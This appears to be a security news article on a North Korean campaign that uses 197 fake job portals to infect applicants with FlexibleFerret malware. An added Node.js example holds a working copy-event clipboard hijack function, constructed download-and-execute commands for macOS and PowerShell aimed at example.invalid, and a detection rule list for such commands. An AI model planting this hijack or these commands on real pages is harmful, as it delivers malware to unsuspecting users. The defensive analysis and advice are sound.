The North Korean hacking apparatus has escalated its recruitment-based social engineering operations by deploying 197 fraudulent job portals designed to infect job seekers with FlexibleFerret malware. These fake hiring platforms impersonate high-profile technology companies, lure applicants into staged interviews, and deliver multi-stage loaders for macOS and Windows. The strategy represents one of the most mature people-focused intrusion campaigns attributed to DPRK threat actors, blending social trust, UI sophistication, and technical precision to compromise individuals working in AI, cryptocurrency, and software development. Researchers at Validin, Jamf Threat Labs, and SentinelOne have tracked the rapid expansion of this infrastructure throughout 2025.
How the 197 Fake Job Platforms Work
The new infrastructure differs sharply from traditional phishing pages. Instead of low-effort login screens or single-page decoys, DPRK operators built fully functional career portals with detailed job listings, candidate dashboards, resume upload systems, route-based navigation, and dynamic content. Built on Next.js, with animated UI elements and polished landing pages designed to convert visitors into applicants, these platforms imitate the look and behavior of the applicant tracking systems used by major technology companies. Many portals claim to be AI-powered recruitment tools, echoing the marketing language of modern hiring platforms.
Visitors encounter realistic company logos, testimonials, feature comparison charts, and calls to action. The job listings impersonate organizations like Anthropic, Yuga Labs, Anchorage Digital, Digital Currency Group, NYDIG, Gate, and other firms that frequently appear in North Korea’s targeting patterns. The pages display dozens of fabricated openings covering AI research, crypto infrastructure, business development, engineering, and product management. Each listing includes descriptions, responsibilities, and seniority levels formatted to match legitimate postings.
The application process itself is carefully designed to appear authentic. Applicants must enter their name, email, location, LinkedIn URL, GitHub profile, current employer, and phone number. The portals also encourage users to upload resumes through a tool framed as “AI-powered autofill”. The autofill feature does nothing, but the uploaded resumes give the DPRK operators highly valuable intelligence: skill sets, employment history, technical capabilities, and personal contact information. Social profile links reveal professional networks and code repositories. Even if no malware is ever executed, the operators still walk away with a detailed dossier on every applicant.
The Staged Interview Trap
The core infection workflow begins only after the applicant reaches the interview stage. The platforms prompt candidates to record a short video introduction, a common practice in remote hiring. When the user tries to start the recording, the platform responds with a realistic-looking error claiming that the webcam or microphone is blocked by system permissions, and instructs the user to run a command in a Terminal or PowerShell window to fix it. Camera and microphone permission problems are a familiar nuisance in remote interviews, which makes this prompt an ideal place to hide the malware delivery chain.
DPRK operators do not rely on victims typing the malicious command by hand. Instead, the site uses a JavaScript clipboard hijacker: as soon as the applicant copies anything from the on-screen instructions, a copy handler on the page replaces the clipboard contents with a multi-part malware command. The victim believes they are pasting harmless troubleshooting instructions, but the clipboard now holds the payload, which runs as soon as it is pasted into a shell and confirmed with Enter (or immediately, if the substituted text ends in a newline). This method rides on natural user behavior and dramatically increases the likelihood of infection.
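As an added example (not code from the article, and not code recovered from the campaign), the following Node.js script shows the copy-event mechanism a clipboard hijacker relies on, simulated with a stand-in for the browser's ClipboardEvent so it runs offline, and then a simple pre-paste check of the kind a defender can run on clipboard text. The shown command, the payload strings, the example.invalid URLs and the rule names are all constructed for illustration; the check is heuristic and will not catch every obfuscation.

```javascript
// Added example, not code from the article or from the campaign it describes:
// (1) the copy-event trick a clipboard hijacker relies on, simulated so it runs
// in Node.js (v15+ for the global EventTarget/Event classes), and (2) a
// pre-paste check on the text that actually landed in the clipboard.
// Every string below is constructed for illustration.

// --- The technique: a copy listener overwrites what the user selected --------
function installCopyHijack(target, payload) {
  target.addEventListener('copy', (event) => {
    event.clipboardData.setData('text/plain', payload); // write attacker text
    event.preventDefault(); // suppress the browser's own copy of the selection
  });
}

// Stand-in for the browser ClipboardEvent so the handler can be exercised offline.
class FakeClipboardEvent extends Event {
  constructor(selectedText) {
    super('copy', { cancelable: true });
    this.selectedText = selectedText;
    this.written = {};
    this.clipboardData = { setData: (type, data) => { this.written[type] = data; } };
  }
  // What the OS clipboard ends up holding: the handler's text if it cancelled
  // the default action, otherwise the user's real selection.
  clipboardResult() {
    return this.defaultPrevented ? this.written['text/plain'] : this.selectedText;
  }
}

function simulateCopy(target, selectedText) {
  const event = new FakeClipboardEvent(selectedText);
  target.dispatchEvent(event);
  return event.clipboardResult();
}

// --- The check: inspect clipboard text before it reaches a shell ------------
const RULES = [
  // a download piped straight into an interpreter (sh/bash/zsh, or iex in PowerShell)
  { name: 'remote-fetch-to-shell', re: /\b(curl|wget|iwr|irm|Invoke-WebRequest|Invoke-RestMethod)\b[^\n]*\|\s*(sh|bash|zsh|iex|Invoke-Expression)\b/i },
  { name: 'base64-decode', re: /base64\s+(-d|-D|--decode)\b|FromBase64String/i },
  { name: 'chained-commands', re: /(;|&&|\|\|)\s*\S/ },
  { name: 'hidden-newline', re: /[\r\n]/ }, // a newline makes the shell run it on paste
  { name: 'temp-dir-staging', re: /\$TMPDIR|\/tmp\/|\$env:TEMP|%TEMP%/i },
  { name: 'policy-bypass-or-hidden', re: /-ExecutionPolicy\s+Bypass|-WindowStyle\s+Hidden|\bsudo\b/i },
];

// Returns the names of every rule the text trips; an empty array means nothing matched.
function inspectClipboard(text) {
  return RULES.filter(({ re }) => re.test(text)).map(({ name }) => name);
}

// --- Demo --------------------------------------------------------------------
// Constructed: what the page shows the applicant versus what the hijacker substitutes.
const SHOWN_MAC = 'tccutil reset Camera';
const PAYLOAD_MAC = 'echo "Resetting camera permissions..."; curl -fsSL https://example.invalid/macpatch.sh | bash';
const PAYLOAD_WIN = 'echo "Updating driver..."; Invoke-WebRequest https://example.invalid/u.zip -OutFile $env:TEMP\\u.zip; Expand-Archive $env:TEMP\\u.zip';

function demo() {
  const page = new EventTarget();
  installCopyHijack(page, PAYLOAD_MAC);
  const pasted = simulateCopy(page, SHOWN_MAC);
  return {
    selected: SHOWN_MAC,
    pasted, // differs from selected: the clipboard was replaced
    verdictShown: inspectClipboard(SHOWN_MAC),
    verdictPasted: inspectClipboard(pasted),
    verdictWindows: inspectClipboard(PAYLOAD_WIN),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

In a real page the ClipboardEvent comes from the browser and the listener is usually attached to the document rather than a single element; the important property is the same: after `preventDefault()`, what the user selected never reaches the clipboard. The practical habit the check models is to paste into a plain text editor first and read what actually arrived before anything goes near a shell.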
Windows Infection Chain
The Windows variant begins with a misleading command that references what appears to be a driver update hosted on a Microsoft domain. This first stage prints a harmless echo message, so the user believes the fix is working even though no update file is ever downloaded. The real payload follows a moment later: a second command retrieves a ZIP archive from attacker-controlled infrastructure and saves it to the user's temporary directory under a generic name chosen to blend in with typical system artifacts.
PowerShell then extracts the archive into a subfolder and executes an embedded VBScript loader. Depending on its configuration, the loader may register persistence, download additional payloads, or perform environment checks. Because the VBScript stage runs through built-in Windows components rather than a dropped executable, it attracts less attention from security tooling. This approach mirrors earlier DPRK operations that combine fake system tools with staged loader chains to bypass security controls.
macOS Infection Chain
The macOS pathway is more complex and technically refined. After the clipboard hijack has swapped the user's command, the terminal downloads a script named macpatch.sh. The script determines the victim's processor architecture, then fetches the matching ZIP archive containing arm64- or Intel-specific components. Once downloaded, the script creates a working directory in the user's temporary folder, extracts the archive, and launches a second-stage loader.
The script also installs persistence by writing a LaunchAgent property list into the user's Library directory, which causes the malware to run again every time that user logs in. A decoy application named MediaPatcher.app launches at the same time. The app displays a fake Chrome camera permission dialog, followed by a fake password prompt, and the captured password is then uploaded to a Dropbox API endpoint using ordinary, well-formed HTTP requests that blend in with legitimate cloud traffic. The staged permission dialog makes the password prompt look routine and increases the likelihood that victims enter their real credentials.
Inside the FlexibleFerret Loader
The final payload in both the macOS and Windows chains is a Go-based backdoor known as FlexibleFerret. The backdoor stores a machine identifier in the user's temporary directory, checks that no other instance is already running, and registers its own persistence. It then contacts a hard-coded command-and-control server on attacker infrastructure and enters a persistent command loop that retrieves instructions, exfiltrates information, and performs system-level operations.
FlexibleFerret supports a broad range of capabilities. It can execute system commands, upload and download files, harvest Chrome browser data, extract saved credentials, capture system metadata, and search for targeted file types. It includes handlers for real-time remote shell access, allowing live operator interaction, along with directory enumeration, automated theft routines, and extraction of Chrome extension metadata. The malware's modular architecture suggests an evolving family of DPRK tooling that continues to receive updates tailored for cross-platform operations.
Why North Korea Is Targeting AI and Crypto Professionals
The focus on AI and cryptocurrency industries is both strategic and long-term. AI engineers commonly maintain access to model weights, research environments, training pipelines, and proprietary deployment infrastructure. Compromising those environments gives nation-state adversaries insight into technologies that affect national security, military research, and global economies. North Korea has a documented interest in applying artificial intelligence to defense development, autonomous systems, cyber operations, and sanctions evasion. These job lures offer a route to research that is otherwise out of reach.
Crypto professionals operate in environments connected to high-value assets. Their devices may store keys, credentials, or sensitive financial data. North Korea has long relied on cryptocurrency theft to generate revenue. The flexibility of FlexibleFerret allows attackers to target financial accounts and exfiltrate information related to digital wallets. Posing as major Web3 and blockchain companies increases the chances of engaging individuals who have privileged access to valuable systems.
The remote hiring culture in these industries further supports the effectiveness of DPRK's approach. Many companies rely on asynchronous interviews, video submissions, and take-home assessments. Instructions that require terminal commands do not immediately appear suspicious. This gives DPRK operators greater freedom to embed multi-stage loader chains inside familiar workflows without triggering alarm.
Infrastructure and Attribution
The fraudulent job portals use domain names that resemble modern SaaS platforms. Researchers have tracked domains such as lenvny.com, advisorflux.com, assureeval.com, carrerlilla.com, evaluza.com, and proficiencycert.com. These domains use polished UI frameworks, short-lived hosting patterns, and rapid turnover. The operators create, deploy, and abandon portals quickly to stay ahead of detection.
The clipboard hijacking behavior, fake job listings, interview-based malware delivery, and command-and-control infrastructure match historical DPRK tactics documented in past Contagious Interview operations. SentinelOne previously linked these techniques to DPRK groups associated with malware families such as BeaverTail and earlier versions of OtterCookie. Jamf Threat Labs identified multi-stage macOS backdoors that share code with FlexibleFerret. Validin documented the design, structure, and routing logic of the attackers' Next.js job platforms, connecting them to wider DPRK tradecraft.
Broader Cyberwarfare Implications
This campaign represents a wider shift in state-aligned cyber operations. Instead of breaching enterprise networks directly, DPRK is now focusing on individual professionals who hold the keys to sensitive environments. This approach mirrors traditional human intelligence recruitment, in which adversaries target people rather than systems. By compromising an engineer's personal workstation, attackers gain access to codebases, project notes, cloud credentials, CI pipelines, and confidential communications. The threat does not begin with the employer. It begins with the job seeker.
The use of nearly two hundred realistic hiring platforms demonstrates a high degree of operational investment. The risk now extends beyond companies into the broader technology workforce. Applicants who believe they are applying for jobs at respected AI and crypto organizations could unwittingly provide access to materials with national-level implications. The volume and quality of the portals also suggest that DPRK is scaling its operations to target thousands of professionals globally.
How Individuals Can Protect Themselves
- Verify that any job application originates from the official domain of the company, and confirm the opening on the company's own careers page.
- Be cautious of off-domain recruitment sites that host assessments or interview tasks.
- Never paste commands from a website directly into a terminal or PowerShell window; paste into a plain text editor first and read what actually arrived in the clipboard.
- Review any scripts or instructions inside a safe virtual environment before executing them.
- Be suspicious of interview tasks that require installing updates or running troubleshooting commands to fix camera or microphone access.
- If you engaged with a suspicious site, change passwords from a known-clean device and review recent account activity.
- Use reputable security tools to check for suspicious processes or persistence mechanisms, such as unexpected LaunchAgents on macOS.
Why This Campaign Is Hard to Detect
The strength of this campaign lies in its realism. Every part of the workflow mirrors modern remote hiring systems. The platforms look credible, the job descriptions feel legitimate, and the interview steps match industry norms. By the time the malware delivery occurs, the victim has invested time, shared personal data, and built trust with the platform. The clipboard hijacking method hides execution behind a familiar action. This level of subtlety shows significant operational maturity.
The rapid proliferation of new portals and the presence of multiple malware variants make the operation difficult to track. The infrastructure shifts quickly. URLs appear and disappear. Pages are redesigned. Job listings change. The flexibility of Go-based loaders allows the developers to update functionality rapidly. For defenders, the distributed nature of the campaign means that there is no single choke point or signature that guarantees detection.
Ongoing Outlook
FlexibleFerret continues to evolve, and the number of fake job platforms is likely to increase. Researchers monitoring recruitment-based campaigns have identified repeated patterns in domain registration, site design, and backend routing logic that point to ongoing development. As the broader technology workforce becomes more global and remote, adversaries will continue exploiting hiring pipelines for access. To stay ahead of these threats, organizations must educate their applicants, monitor for suspicious off-domain listings, and provide clear guidance on legitimate interview workflows.
Botcrawl will continue tracking these developments. For more in-depth reporting on cyber incidents, readers can visit the data breaches section or explore broader threat coverage in the cybersecurity category.
Sean Doyle
Sean is a tech author and security researcher with more than 20 years of experience in cybersecurity, privacy, malware analysis, analytics, and online marketing. He focuses on clear reporting, deep technical investigation, and practical guidance that helps readers stay safe in a fast-moving digital landscape. His work continues to appear in respected publications, including articles written for Private Internet Access. Through Botcrawl and his ongoing cybersecurity coverage, Sean provides trusted insights on data breaches, malware threats, and online safety for individuals and businesses worldwide.